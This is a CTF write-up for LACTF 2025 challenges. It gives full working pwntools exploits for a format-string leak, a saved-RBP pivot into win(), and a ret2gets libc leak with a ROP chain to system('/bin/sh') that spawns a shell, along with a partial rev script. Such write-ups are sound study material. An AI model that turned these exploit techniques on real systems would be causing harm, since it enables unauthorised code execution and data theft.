index

This is a very good CTF competition, and maybe since I first learned pwn until now I have played a good competition like this. In this CTF I have solved 3 pwn challenges and 1 rev challenge. After a busy time with school exams, I decided to start writing write ups for the challenges I solved.

pwn/2password

Description

2Password > 1Password

Reverse Engineering

1
[*] '/home/alter/CTFs/2025/LACTF2025/2password/chall'
2
    Arch:       amd64-64-little
3
    RELRO:      Partial RELRO
4
    Stack:      No canary found
5
    NX:         NX enabled
6
    PIE:        PIE enabled
7
    Stripped:   No

From the security checks on the binary, we can make several key observations:

No Stack Canary: The binary does not use stack canaries, meaning it lacks protection against stack-based buffer overflows. This makes it easier to overwrite return addresses without triggering a security check.
PIE Enabled: Position Independent Executable (PIE) is enabled, which means that memory addresses are randomized on each execution. This makes absolute address leaks necessary for a reliable exploit.
NX Enabled: The Non-Executable (NX) bit is enabled, preventing direct execution of shellcode on the stack. An exploit would likely require techniques like ROP (Return-Oriented Programming).
Partial RELRO: Partial Relocation Read-Only (RELRO) suggests that the GOT (Global Offset Table) is writable, which could be useful for GOT overwrite attacks.

But before we know what to to next we need to analysis the pseudo-code gave by IDA:

1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  char flag[48]; // [rsp+0h] [rbp-D0h] BYREF
4
  char password2[48]; // [rsp+30h] [rbp-A0h] BYREF
5
  char password1[48]; // [rsp+60h] [rbp-70h] BYREF
6
  char username[56]; // [rsp+90h] [rbp-40h] BYREF
7
  FILE *stdin@GLIBC_2.2.5; // [rsp+C8h] [rbp-8h]
8

9
  setbuf(stdout, 0LL);
10
  printf("Enter username: ");
11
  readline(username, 42LL, stdin);
12
  printf("Enter password1: ");
13
  readline(password1, 42LL, stdin);
14
  printf("Enter password2: ");
15
  readline(password2, 42LL, stdin);
16
  stdin@GLIBC_2.2.5 = fopen("flag.txt", "r");
17
  if ( !stdin@GLIBC_2.2.5 )
18
  {
19
    puts("can't open flag");
20
    exit(1);
21
  }
22
  readline(flag, 42LL, stdin@GLIBC_2.2.5);
23
  if ( !strcmp(username, "kaiphait") && !strcmp(password1, "correct horse battery staple") && !strcmp(password2, flag) )
24
  {
25
    puts("Access granted");
26
  }
27
  else
28
  {
29
    printf("Incorrect password for user ");
30
    printf(username);
31
    putchar(10);
32
  }
33
  return 0;
34
}

From the pseudo-code, the program follows this sequence:

Prompts for username → stores it in username[]
Prompts for password1 → stores it in password1[]
Prompts for password2 → stores it in password2[]
Reads the flag from flag.txt into flag[]
Compares the inputs with hardcoded values

If the credentials don’t match, the program prints:

1
  else
2
  {
3
    printf("Incorrect password for user ");
4
    printf(username);
5
    putchar(10);
6
  }

Exploit Development

Since printf() is used without a format specifier, it treats username as a format string. This means if we input format specifiers (%x, %s, %p, etc.), they will be interpreted instead of being printed as plain text. But in this article we cannot use %s to leak data because the variable flag is declared and placed right on the stack, and when reading data from flag.txt it will be saved here. Format string %s can only leak data when it is a specific address. So the alternative way is use %p and then unpack it to see the value

1
#!/usr/bin/env python3
2
# -*- coding: utf-8 -*-
3
from pwncus import *
4
import struct
5

6
context.log_level = 'debug'
7
exe = context.binary = ELF('./chall', checksec=False)
8
libc = exe.libc
9

10
def start(argv=[], *a, **kw):
11
    if args.GDB:
12
        return gdb.debug([exe.path] + argv, gdbscript='''
13

14

15
        c
16
        '''.format(**locals()), *a, **kw)
17
    elif args.REMOTE:
18
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
19
    else:
20
        return process([exe.path] + argv, *a, **kw)
21

22
p = start()
23

24
# ==================== EXPLOIT ====================
25

26
def exploit():
27

28
    payload = b'%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|'
29

30
    sla(b'username: ', payload)
31
    sl(b'A')
32
    ru(b'user ')
33

34
    output = rl()[:-1].split(b'|')
35

36
    for index, value in enumerate(output):
37

38
        if value == b"(nil)":
39
            encoded_value = b"(nil)"
40
        else:
41
            try:
42
                int_value = int(value, 16)
43
                encoded_value = struct.pack("<Q", int_value)
44
            except ValueError:
45
                encoded_value = b"(error)"
46

47
        print(f'Index: {index} -> Value: {value} -> Encoded: {encoded_value} ' )
48

49
    interactive()
50

51
if __name__ == '__main__':
52
  exploit()

Get flag

1
alter ^ Sol in ~/CTFs/2025/LACTF2025/2password
2
$ ./xpl.py REMOTE chall.lac.tf 31142
3
[*] '/usr/lib/x86_64-linux-gnu/libc.so.6'
4
    Arch:       amd64-64-little
5
    RELRO:      Partial RELRO
6
    Stack:      Canary found
7
    NX:         NX enabled
8
    PIE:        PIE enabled
9
    SHSTK:      Enabled
10
    IBT:        Enabled
11
[+] Opening connection to chall.lac.tf on port 31142: Done
12
[DEBUG] Received 0x10 bytes:
13
    b'Enter username: '
14
[DEBUG] Sent 0x2b bytes:
15
    b'%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|\n'
16
[DEBUG] Sent 0x2 bytes:
17
    b'A\n'
18
[DEBUG] Received 0x22 bytes:
19
    b'Enter password1: Enter password2: '
20
[DEBUG] Received 0xa6 bytes:
21
    b'Incorrect password for user 0x7fffb4906390|(nil)|(nil)|0x571f409f84a8|(nil)|0x75687b667463616c|0x66635f327265746e|0x7d38367a783063|(nil)|(nil)|(nil)|0x41|(nil)|(nil)\n'
22
Index: 0 -> Value: b'0x7fffb4906390' -> Encoded: b'\x90c\x90\xb4\xff\x7f\x00\x00'
23
Index: 1 -> Value: b'(nil)' -> Encoded: b'(nil)'
24
Index: 2 -> Value: b'(nil)' -> Encoded: b'(nil)'
25
Index: 3 -> Value: b'0x571f409f84a8' -> Encoded: b'\xa8\x84\x9f@\x1fW\x00\x00'
26
Index: 4 -> Value: b'(nil)' -> Encoded: b'(nil)'
27
Index: 5 -> Value: b'0x75687b667463616c' -> Encoded: b'lactf{hu'
28
Index: 6 -> Value: b'0x66635f327265746e' -> Encoded: b'nter2_cf'
29
Index: 7 -> Value: b'0x7d38367a783063' -> Encoded: b'c0xz68}\x00'
30
Index: 8 -> Value: b'(nil)' -> Encoded: b'(nil)'
31
Index: 9 -> Value: b'(nil)' -> Encoded: b'(nil)'
32
Index: 10 -> Value: b'(nil)' -> Encoded: b'(nil)'
33
Index: 11 -> Value: b'0x41' -> Encoded: b'A\x00\x00\x00\x00\x00\x00\x00'
34
Index: 12 -> Value: b'(nil)' -> Encoded: b'(nil)'
35
Index: 13 -> Value: b'(nil)' -> Encoded: b'(nil)'
36
[*] Switching to interactive mode
37
[*] Got EOF while reading in interactive

pwn/state-change

Description

Changes in state are like rustlings in the wind

Analysis

1
[*] '/home/alter/CTFs/2025/LACTF2025/state-change/chall'
2
    Arch:       amd64-64-little
3
    RELRO:      Full RELRO
4
    Stack:      No canary found
5
    NX:         NX enabled
6
    PIE:        No PIE (0x400000)
7
    SHSTK:      Enabled
8
    IBT:        Enabled
9
    Stripped:   No

From the security checks on the binary, we can make several key observations:

No Stack Canary → Vulnerable to stack-based buffer overflows.
NX Enabled → The stack is non-executable, so shellcode injection won’t work; ROP (Return-Oriented Programming) may be needed.
No PIE → Binary is loaded at a fixed address (0x400000), making ROP exploitation easier since function addresses are static.
Full RELRO → The GOT (Global Offset Table) is read-only, preventing GOT overwrite attacks.

In this challenge we are given the source code, let’s look at it and analyze what it has.

1
#include <stdio.h>
2
#include <string.h>
3

4
char buf[0x500]; // Wow so useful
5
int state;
6
char errorMsg[0x70];
7

8
void win() {
9
    char filebuf[64];
10
    strcpy(filebuf, "./flag.txt");
11
    FILE* flagfile = fopen("flag.txt", "r");
12

13
    /* ********** ********** */
14
    // Note this condition in win()
15
    if(state != 0xf1eeee2d) {
16
        puts("\ntoo ded to gib you the flag");
17
        exit(1);
18
    }
19
    /* ********** ********** */
20

21
    if (flagfile == NULL) {
22
        puts(errorMsg);
23
    } else {
24
        char buf[256];
25
        fgets(buf, 256, flagfile);
26
        buf[strcspn(buf, "\n")] = '\0';
27
        puts("Here's the flag: ");
28
        puts(buf);
29
    }
30
}
31

32
void vuln(){
33
    char local_buf[0x20];
34
    puts("Hey there, I'm deaddead. Who are you?");
35
    fgets(local_buf, 0x30, stdin);
36
}
37

38
int main(){
39

40
    state = 0xdeaddead;
41
    strcpy(errorMsg, "Couldn't read flag file. Either create a test flag.txt locally and try connecting to the server to run instead.");
42

43
    setbuf(stdin, 0);
44
    setbuf(stdout, 0);
45

46
    vuln();
47

48
    return 0;
49
}

At first glance, this seems to be a ret2win challenge because we have the win function here, but if we look closely, in the win function we need another condition, which is that state must be equal to 0xf1eeee2d, this will make it harder for us to change its data.

But in the vuln() function:

1
void vuln(){
2
    char local_buf[0x20];
3
    puts("Hey there, I'm deaddead. Who are you?");
4
    fgets(local_buf, 0x30, stdin);
5
}

We can see that there’s a Buffer Overflow, and let check what we can overwrite if we input full 0x30 byte:

1
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
2
──────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────
3
 RAX  0x7fffffffdbc0 ◂— 'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaa'
4
 RBX  0
5
*RCX  0x7ffff7e987e2 (read+18) ◂— cmp rax, -0x1000 /* 'H=' */
6
*RDX  0xfbad208b
7
*RDI  0x7ffff7fa0a80 (_IO_stdfile_0_lock) ◂— 0
8
*RSI  0x7ffff7f9eb23 (_IO_2_1_stdin_+131) ◂— 0xfa0a800000000061 /* 'a' */
9
*R8   0
10
*R9   0
11
 R10  0x7ffff7fc3908 ◂— 0xd00120000000e
12
 R11  0x246
13
 R12  0x7fffffffdd08 —▸ 0x7fffffffdf9f ◂— '/home/alter/CTFs/2025/LACTF2025/state-change/chall'
14
 R13  0x4012eb (main) ◂— endbr64
15
 R14  0x403db0 (__do_global_dtors_aux_fini_array_entry) —▸ 0x4011a0 (__do_global_dtors_aux) ◂— endbr64
16
 R15  0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
17
 RBP  0x7fffffffdbe0 ◂— 'eaaaaaaafaaaaaa'
18
 RSP  0x7fffffffdbc0 ◂— 'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaa'
19
*RIP  0x4012e8 (vuln+51) ◂— nop
20
───────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────
21
   0x4012d0 <vuln+27>    mov    rdx, qword ptr [rip + 0x2d59]     RDX, [stdin@GLIBC_2.2.5] => 0x7ffff7f9eaa0 (_IO_2_1_stdin_) ◂— 0xfbad208b
22
   0x4012d7 <vuln+34>    lea    rax, [rbp - 0x20]                 RAX => 0x7fffffffdbc0 ◂— 2
23
   0x4012db <vuln+38>    mov    esi, 0x30                         ESI => 0x30
24
   0x4012e0 <vuln+43>    mov    rdi, rax                          RDI => 0x7fffffffdbc0 ◂— 2
25
   0x4012e3 <vuln+46>    call   fgets@plt                   <fgets@plt>
26

27
 ► 0x4012e8 <vuln+51>    nop
28
   0x4012e9 <vuln+52>    leave
29
   0x4012ea <vuln+53>    ret
30

31
   0x4012eb <main>       endbr64
32
   0x4012ef <main+4>     push   rbp
33
   0x4012f0 <main+5>     mov    rbp, rsp
34
────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────
35
00:0000│ rax rsp 0x7fffffffdbc0 ◂— 'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaa'
36
01:0008│-018     0x7fffffffdbc8 ◂— 'baaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaa'
37
02:0010│-010     0x7fffffffdbd0 ◂— 'caaaaaaadaaaaaaaeaaaaaaafaaaaaa'
38
03:0018│-008     0x7fffffffdbd8 ◂— 'daaaaaaaeaaaaaaafaaaaaa'
39
04:0020│ rbp     0x7fffffffdbe0 ◂— 'eaaaaaaafaaaaaa'
40
05:0028│+008     0x7fffffffdbe8 ◂— 0x61616161616166 /* 'faaaaaa' */
41
06:0030│+010     0x7fffffffdbf0 ◂— 1
42
07:0038│+018     0x7fffffffdbf8 —▸ 0x7ffff7dadd90 (__libc_start_call_main+128) ◂— mov edi, eax
43
──────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────
44
 ► 0         0x4012e8 vuln+51
45
   1 0x61616161616166 None
46
   2              0x1 None
47
   3   0x7ffff7dadd90 __libc_start_call_main+128
48
   4   0x7ffff7dade40 __libc_start_main+128
49
   5         0x401115 _start+37

We can see we have control over both saved RBP and saved RIP

Exploit Development

Our objective is to modify the state variable to 0xf1eeee2d, and we have control over both the saved RBP and saved RIP. Before diving into the exploit, let’s analyze how fgets() operates in this context.

1
   0x4012d0 <vuln+27>    mov    rdx, qword ptr [rip + 0x2d59]     RDX, [stdin@GLIBC_2.2.5] => 0x7ffff7f9eaa0 (_IO_2_1_stdin_) ◂— 0xfbad208b
2
   0x4012d7 <vuln+34>    lea    rax, [rbp - 0x20]                 RAX => 0x7fffffffdbc0 ◂— 2
3
   0x4012db <vuln+38>    mov    esi, 0x30                         ESI => 0x30
4
   0x4012e0 <vuln+43>    mov    rdi, rax                          RDI => 0x7fffffffdbc0 ◂— 2
5
   0x4012e3 <vuln+46>    call   fgets@plt                   <fgets@plt>

Here, lea rax, [rbp - 0x20] loads the buffer’s address into RAX, which is then passed as RDI to fgets(). With control over saved RBP and a buffer overflow, we can manipulate where the program writes our input.

1
pwndbg> x/10xg 0x404540
2
0x404540 <state>:       0x00000000deaddead      0x0000000000000000
3
0x404550:       0x0000000000000000      0x0000000000000000
4
0x404560 <errorMsg>:    0x74276e646c756f43      0x6c66206461657220
5
0x404570 <errorMsg+16>: 0x2e656c6966206761      0x2072656874694520
6
0x404580 <errorMsg+32>: 0x6120657461657263      0x6c66207473657420
7
pwndbg> x/10xg (0x404540-0x10)
8
0x404530 <buf+1264>:    0x0000000000000000      0x0000000000000000
9
0x404540 <state>:       0x00000000deaddead      0x0000000000000000
10
0x404550:       0x0000000000000000      0x0000000000000000
11
0x404560 <errorMsg>:    0x74276e646c756f43      0x6c66206461657220
12
0x404570 <errorMsg+16>: 0x2e656c6966206761      0x2072656874694520

Since state is at 0x404540, we need to overwrite it with 0xf1eeee2d. However, to ensure proper alignment and avoid corruption, we write data slightly before state, adjusting our input to target the exact memory region effectively. Hence, we subtract 0x10 from its address to control the write precisely.

1
#!/usr/bin/env python3
2
# -*- coding: utf-8 -*-
3
from pwncus import *
4

5
context.log_level = 'debug'
6
exe = context.binary = ELF('./chall', checksec=False)
7
libc = exe.libc
8

9
def start(argv=[], *a, **kw):
10
    if args.GDB:
11
        return gdb.debug([exe.path] + argv, gdbscript='''
12

13
        b *vuln+53
14
        c
15
        '''.format(**locals()), *a, **kw)
16
    elif args.REMOTE:
17
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
18
    else:
19
        return process([exe.path] + argv, *a, **kw)
20

21
p = start()
22

23
# ==================== EXPLOIT ====================
24

25
def exploit():
26

27
    offset = 32
28
    bss = 0x404530 # state - 0x10
29

30
    payload1 = flat({
31
        offset: [
32
            bss + 0x20,
33
            exe.sym["vuln"]+8
34
        ]
35
    })
36

37
    state = 0xf1eeee2d # Our value need to change
38
    payload2 = b"A" * 0xf + p64(state) + b"B" * 0x10 + p64(exe.sym["win"])
39

40
    sa(b"?", payload1)
41
    sa(b"?", payload2)
42

43
    interactive()
44

45
if __name__ == '__main__':
46
  exploit()

Get flag

1
alter ^ Sol in ~/CTFs/2025/LACTF2025/state-change
2
$ ./xpl.py REMOTE chall.lac.tf 31593
3
[*] '/usr/lib/x86_64-linux-gnu/libc.so.6'
4
    Arch:       amd64-64-little
5
    RELRO:      Partial RELRO
6
    Stack:      Canary found
7
    NX:         NX enabled
8
    PIE:        PIE enabled
9
    SHSTK:      Enabled
10
    IBT:        Enabled
11
[+] Opening connection to chall.lac.tf on port 31593: Done
12
[DEBUG] Received 0x26 bytes:
13
    b"Hey there, I'm deaddead. Who are you?\n"
14
[DEBUG] Sent 0x30 bytes:
15
    00000000  61 61 61 61  62 61 61 61  63 61 61 61  64 61 61 61  │aaaa│baaa│caaa│daaa│
16
    00000010  65 61 61 61  66 61 61 61  67 61 61 61  68 61 61 61  │eaaa│faaa│gaaa│haaa│
17
    00000020  50 45 40 00  00 00 00 00  bd 12 40 00  00 00 00 00  │PE@·│····│··@·│····│
18
    00000030
19
[DEBUG] Received 0x26 bytes:
20
    b"Hey there, I'm deaddead. Who are you?\n"
21
[DEBUG] Sent 0x2f bytes:
22
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 2d  │AAAA│AAAA│AAAA│AAA-│
23
    00000010  ee ee f1 00  00 00 00 42  42 42 42 42  42 42 42 42  │····│···B│BBBB│BBBB│
24
    00000020  42 42 42 42  42 42 42 d6  11 40 00 00  00 00 00     │BBBB│BBB·│·@··│···│
25
    0000002f
26
[*] Switching to interactive mode
27

28
[DEBUG] Received 0x36 bytes:
29
    b"Here's the flag: \n"
30
    b'lactf{1s_tHi5_y0Ur_1St_3vER_p1VooT}\n'
31
Here's the flag:
32
lactf{1s_tHi5_y0Ur_1St_3vER_p1VooT}

pwn/minceraft

Description

look mom i made minecraft!

Analysis

1
[*] '/home/alter/CTFs/2025/LACTF2025/minecraft/chall'
2
    Arch:       amd64-64-little
3
    RELRO:      Partial RELRO
4
    Stack:      No canary found
5
    NX:         NX enabled
6
    PIE:        No PIE (0x400000)
7
    Stripped:   No

From the security checks on the binary, we can make several key observations:

RELRO: Partial RELRO → GOT is writable, making GOT overwrite attacks possible.
Stack Canary: No canary → Stack-based buffer overflows are easier to exploit.
NX (No-Execute): Enabled → We cannot execute shellcode on the stack.
PIE (Position-Independent Executable): Disabled (0x400000) → The binary has a fixed base address, making ROP (Return-Oriented Programming) easier.

As in the previous challenge, this challenge also comes with source code.

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <unistd.h>
4

5
int read_int() {
6
  int x;
7
  if (scanf(" %d", &x) != 1) {
8
    puts("wtf");
9
    exit(1);
10
  }
11
  return x;
12
}
13

14
int main(void) {
15
  setbuf(stdout, NULL);
16
  while (1) {
17
    puts("\nM I N C E R A F T\n");
18
    puts("1. Singleplayer");
19
    puts("2. Multiplayer");
20
    if (read_int() != 1) {
21
      puts("who needs friends???");
22
      exit(1);
23
    }
24
    puts("Creating new world");
25
    puts("Enter world name:");
26
    char world_name[64];
27
    scanf(" ");
28
    gets(world_name);
29
    puts("Select game mode");
30
    puts("1. Survival");
31
    puts("2. Creative");
32
    if (read_int() != 1) {
33
      puts("only noobs play creative smh");
34
      exit(1);
35
    }
36
    puts("Creating new world");
37
    sleep(1);
38
    puts("25%");
39
    sleep(1);
40
    puts("50%");
41
    sleep(1);
42
    puts("75%");
43
    sleep(1);
44
    puts("100%");
45
    puts("\nYOU DIED\n");
46
    puts("you got blown up by a creeper :(");
47
    puts("1. Return to main menu");
48
    puts("2. Exit");
49
    if (read_int() != 1) {
50
      return 0;
51
    }
52
  }
53
}

So the flow of the program is:

Main Menu: Requires selecting 1. Singleplayer, otherwise exits.
World Creation: Prompts for a name (gets(world_name), buffer overflow risk).
Game Mode Selection: Must choose 1. Survival, or the program exits.
Loading Sequence: Displays progress, then YOU DIED.
Game Over Options: 1. Restart or 2. Exit.

Since the libc version given in this challenge is a pretty high libc version, this proves that the common gadgets used to leak data are no longer available. Normally, in this article, we would use Stack Pivot to leak data, but because this method is quite confusing, so I found another way. When we look closely, we will see that the program uses the gets() function to get our input data.

The gets function only requires a single argument, and this can help us control RDI. And I wrote a simple program to understand how gets() works:

1
# include <stdio.h>
2

3
// gcc demo.c -o demo -no-pie -fno-stack-protector
4

5
int main(){
6

7
  char buf[0x20];
8
  puts("Just test!!");
9
  gets(buf);
10

11
  return 0;
12

13
}

When I use gdb to debug and check the arguments before calling the gets function

1
pwndbg> b*main+39
2
Breakpoint 1 at 0x40117d
3
pwndbg> r
4
Starting program: /home/alter/CTFs/2025/LACTF2025/minecraft/demo
5
[Thread debugging using libthread_db enabled]
6
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
7
Just test!!
8

9
Breakpoint 1, 0x000000000040117d in main ()
10
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
11
──────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────
12
 RAX  0
13
 RBX  0
14
 RCX  0x7ffff7e98887 (write+23) ◂— cmp rax, -0x1000 /* 'H=' */
15
 RDX  1
16
 RDI  0x7fffffffdbf0 —▸ 0x7fffffffdfa9 ◂— 0x34365f363878 /* 'x86_64' */
17
 RSI  1
18
 R8   0
19
 R9   0x4052a0 ◂— 'Just test!!\n'
20
 R10  0x77
21
 R11  0x246
22
 R12  0x7fffffffdd28 —▸ 0x7fffffffdfb1 ◂— '/home/alter/CTFs/2025/LACTF2025/minecraft/demo'
23
 R13  0x401156 (main) ◂— endbr64
24
 R14  0x403e18 (__do_global_dtors_aux_fini_array_entry) —▸ 0x401120 (__do_global_dtors_aux) ◂— endbr64
25
 R15  0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
26
 RBP  0x7fffffffdc10 ◂— 1
27
 RSP  0x7fffffffdbf0 —▸ 0x7fffffffdfa9 ◂— 0x34365f363878 /* 'x86_64' */
28
 RIP  0x40117d (main+39) ◂— call gets@plt
29
───────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────
30
 ► 0x40117d <main+39>    call   gets@plt                    <gets@plt>
31
        rdi: 0x7fffffffdbf0 —▸ 0x7fffffffdfa9 ◂— 0x34365f363878 /* 'x86_64' */
32
        rsi: 1
33
        rdx: 1
34
        rcx: 0x7ffff7e98887 (write+23) ◂— cmp rax, -0x1000 /* 'H=' */

And after calling gets:

1
pwndbg> ni
2
alter
3
0x0000000000401182 in main ()
4
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
5
──────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────
6
*RAX  0x7fffffffdbf0 ◂— 0x7265746c61 /* 'alter' */
7
 RBX  0
8
*RCX  0x7ffff7f9eaa0 (_IO_2_1_stdin_) ◂— 0xfbad2288
9
 RDX  1
10
*RDI  0x7ffff7fa0a80 (_IO_stdfile_0_lock) ◂— 0
11
 RSI  1
12
 R8   0
13
*R9   0
14
 R10  0x77
15
 R11  0x246
16
 R12  0x7fffffffdd28 —▸ 0x7fffffffdfb1 ◂— '/home/alter/CTFs/2025/LACTF2025/minecraft/demo'
17
 R13  0x401156 (main) ◂— endbr64
18
 R14  0x403e18 (__do_global_dtors_aux_fini_array_entry) —▸ 0x401120 (__do_global_dtors_aux) ◂— endbr64
19
 R15  0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
20
 RBP  0x7fffffffdc10 ◂— 1
21
 RSP  0x7fffffffdbf0 ◂— 0x7265746c61 /* 'alter' */
22
*RIP  0x401182 (main+44) ◂— mov eax, 0
23
pwndbg> vmmap $rdi
24
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
25
             Start                End Perm     Size Offset File
26
    0x7ffff7f9e000     0x7ffff7fa0000 rw-p     2000 219000 /usr/lib/x86_64-linux-gnu/libc.so.6
27
►   0x7ffff7fa0000     0x7ffff7fad000 rw-p     d000      0 [anon_7ffff7fa0] +0xa80
28
    0x7ffff7fbb000     0x7ffff7fbd000 rw-p     2000      0 [anon_7ffff7fbb]

Gotcha! we notice that when we call the fgets function, the value of RDI will then be a writable area right below our libc and that is _IO_stdfile_0_lock. And we will use the ret2gets technique here to leak the necessary data. Since this is just a write up, I will not go into the depth of this gets function (I will write an article about this technique later). But for now you can read here to get a rough idea of it.

Exploit Development

With the ideas we have analyzed above, we can easily leak libc and from there get shell.

1
#!/usr/bin/env python3
2
# -*- coding: utf-8 -*-
3
from pwncus import *
4

5
context.log_level = 'debug'
6
exe = context.binary = ELF('./chall_patched', checksec=False)
7
libc = exe.libc
8

9
def start(argv=[], *a, **kw):
10
    if args.GDB:
11
        return gdb.debug([exe.path] + argv, gdbscript='''
12

13
        b*main+170
14
        b*main+460
15
        c
16
        '''.format(**locals()), *a, **kw)
17
    elif args.REMOTE:
18
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
19
    else:
20
        return process([exe.path] + argv, *a, **kw)
21

22
p = start()
23

24
# ==================== EXPLOIT ====================
25

26
def choice(option):
27

28
    sl(str(f'{option}'))
29

30
def stage1():
31

32
    pop_rbp = 0x40115d # pop rbp; ret;
33
    ret = 0x401016
34

35
    payload = flat({
36
        offset: [
37
            exe.plt["gets"],
38
            exe.plt["gets"],
39
            exe.plt["puts"],
40
            exe.sym["main"]
41
        ]
42
    })
43

44
    choice(1)
45
    sla(b'name:\n', payload)
46
    choice(1)
47
    choice(2)
48

49
    sl(b"A" * 4 + b"\x00"*3)
50

51
    ru(b"AAAA\xff\xff\xff\xff")
52
    leak = u64(rl()[:-1].ljust(0x8, b'\0'))
53
    libc.address = leak + 0x28c0
54

55
    slog('Leak', leak)
56
    slog('Libc base', libc.address)
57

58
def stage2():
59

60
    rop = ROP(libc)
61
    pop_rdi = rop.find_gadget(["pop rdi", "ret"])[0]
62

63
    payload = flat({
64

65
        offset: [
66
            pop_rdi,
67
            next(libc.search(b'/bin/sh\0')),
68
            pop_rdi + 1,
69
            libc.sym.system
70
        ]
71

72
    })
73

74
    choice(1)
75
    sla(b'name:\n', payload)
76
    choice(1)
77
    choice(2)
78

79
def exploit():
80

81
    global offset
82

83
    offset = 72
84

85
    stage1()
86
    stage2()
87

88
    interactive()
89

90
if __name__ == '__main__':
91
  exploit()

Get flag

1
alter ^ Sol in ~/CTFs/2025/LACTF2025/minecraft
2
$ ./xpl.py REMOTE chall.lac.tf 31137
3
[*] '/home/alter/CTFs/2025/LACTF2025/minecraft/libc.so.6'
4
    Arch:       amd64-64-little
5
    RELRO:      Partial RELRO
6
    Stack:      Canary found
7
    NX:         NX enabled
8
    PIE:        PIE enabled
9
[+] Opening connection to chall.lac.tf on port 31137: Done
10
/home/alter/custom_libs/pwncus/pwncus.py:13: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
11
  sl = lambda data: __main__.p.sendline(data)
12
[+] Leak: 0x7a496595e740
13
[+] Libc base: 0x7a4965961000
14
[*] Loaded 197 cached gadgets for '/home/alter/CTFs/2025/LACTF2025/minecraft/libc.so.6'
15
/home/alter/custom_libs/pwncus/pwncus.py:13: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
16
  sl = lambda data: __main__.p.sendline(data)
17
[*] Switching to interactive mode
18
Select game mode
19
1. Survival
20
2. Creative
21
Creating new world
22
25%
23
50%
24
75%
25
100%
26

27
YOU DIED
28

29
you got blown up by a creeper :(
30
1. Return to main menu
31
2. Exit
32
$ ls
33
flag.txt
34
run
35
$ cat flag.txt
36
lactf{miiineeeee_diaaaaamoooonddsssssss_ky8cnd5e}

rev/the-eye

Description

I believe we’ve reached the end of our journey. All that remains is to collapse the innumerable possibilities before us.

Analysis

1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  unsigned int seed; // eax
4
  char *s; // [rsp+0h] [rbp-10h]
5
  int i; // [rsp+Ch] [rbp-4h]
6

7
  seed = time(0LL);
8
  srand(seed);
9
  s = (char *)read_msg();
10
  for ( i = 0; i <= 21; ++i )
11
    shuffle(s);
12
  puts(s);
13
  free(s);
14
  return 0;
15
}

1
__int64 __fastcall shuffle(const char *s)
2
{
3
  __int64 str_len; // rax
4
  unsigned __int8 temp; // [rsp+13h] [rbp-Dh]
5
  int rand_value; // [rsp+14h] [rbp-Ch]
6
  int i; // [rsp+1Ch] [rbp-4h]
7

8
  str_len = (unsigned int)strlen(s) - 1;
9
  for ( i = str_len; i >= 0; --i )
10
  {
11
    rand_value = rand() % (i + 1);
12
    temp = s[i];
13
    s[i] = s[rand_value];
14
    str_len = temp;                             // <------- ????
15
    s[rand_value] = temp;
16
  }
17
  return str_len;
18
}

The shuffle function implements a Fisher-Yates shuffle (also known as the Knuth shuffle) to randomly rearrange the characters of a given string s. And the flow of that functions is:

Get the length of the string (strlen(s) - 1).
Iterate from the end of the string to the beginning:
Generate a random index within the current range (rand() % (i + 1)).
Swap the character at the current index with the character at the random index.

This way the strings will be suffled up and then printed out using the puts function. Since its values are random after each loop run, to get the most accurate flag we need to brute force it until we find the string containing the flag in it.

Script

And I simply wrote an unshuffled program with the same logic as the program did

P/s: We have to iterate backwards through the strings because the shuffle is a series of sequential swaps, and to undo it we have to reverse each step.

1
from ctypes import CDLL
2
from ctypes.util import find_library
3

4
libc = CDLL(find_library("c"))
5

6
def unshuffle(message, seed):
7
    # Convert string to list once
8
    chars = list(message)
9
    libc.srand(seed)
10

11
    # Pre-calculate all random numbers
12
    n = len(chars)
13
    rands = []
14
    print(f"\nRandom numbers for seed {seed}:")
15
    for round_num in range(22):
16
        temp = []
17
        print(f"\nRound {round_num + 1}:")
18
        for i in range(n - 1, -1, -1):
19
            rand_val = libc.rand() % (i + 1)
20
            temp.append(rand_val)
21
            print(f"{rand_val}", end=" ")
22
        rands.append(temp)
23
    print("\n")
24

25
    # Apply unshuffling
26
    for rand_seq in rands[::-1]:
27
        for i, rand_val in enumerate(rand_seq[::-1]):
28
            chars[i], chars[rand_val] = chars[rand_val], chars[i]
29

30
    return ''.join(chars)
31

32
def find_flag():
33
